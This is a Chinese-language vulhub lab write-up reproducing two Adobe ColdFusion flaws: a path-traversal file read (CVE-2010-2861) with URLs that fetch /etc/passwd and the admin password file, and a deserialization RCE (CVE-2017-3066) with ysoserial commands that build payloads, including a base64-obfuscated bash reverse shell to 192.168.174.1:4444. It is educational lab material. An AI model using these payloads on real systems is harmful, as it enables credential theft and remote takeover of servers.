vulhub漏洞复现系列之Adobe ColdFusion（cve-2010-2861文件读取漏洞、CVE-2017-3066反序列化漏洞）

CVE-2010-2861）Adobe ColdFusion 文件读取漏洞

一、漏洞简介
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。
二、漏洞影响
Adobe ColdFusion 8
Adobe ColdFusion 9
三、漏洞复现
直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en，即可读取文件/etc/passwd：

读取后台管理员密码http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en

coldfusion反序列化漏洞（CVE-2017-3066）

漏洞详情：
Adobe ColdFusion是美国奥多比（Adobe）公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
漏洞影响
Adobe ColdFusion (2016 release) Update 3及之前的版本，
ColdFusion 11 Update 11及之前的版本，
ColdFusion 10 Update 22及之前的版本。
漏洞复现：
建议使用linux生成poc，windows会出现报错。
这里是让他在tmp文件夹中创建一个名为lin的文件

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/lin' poc.ser

生成poc.ser文件后，

将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf，Content-Type为application/x-amf
具体操作呢，先通过bp抓到一个get请求包

然后变更请求方式

再把在linux生成的poc文件拉到window上，再通过bp黏贴到包中（如果你是用linux做的就直接bp抓包然后按以下操作就行），

发送包，返回200，到靶场中查看一下

lin文件成功创建，漏洞利用成功
那就试试直接把touch命令改为bash命令试一下能不能反弹shell

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -i >& /dev/tcp/192.168.174.1/4444 0>&1 ' poc.ser

虽然返回的是200，但是没有反弹成功。

拿到http://www.jackson-t.ca/runtime-exec-payloads.html这里把bash命令加密一下
bash -i >& /dev/tcp/192.168.174.1/4444 0>&1

在linux中重新生成一个poc.ser，按上边步骤再来一次。

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 ' bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xLzQ0NDQgMD4mMSA=}|{base64,-d}|{bash,-i} ' poc.ser

成功反弹shell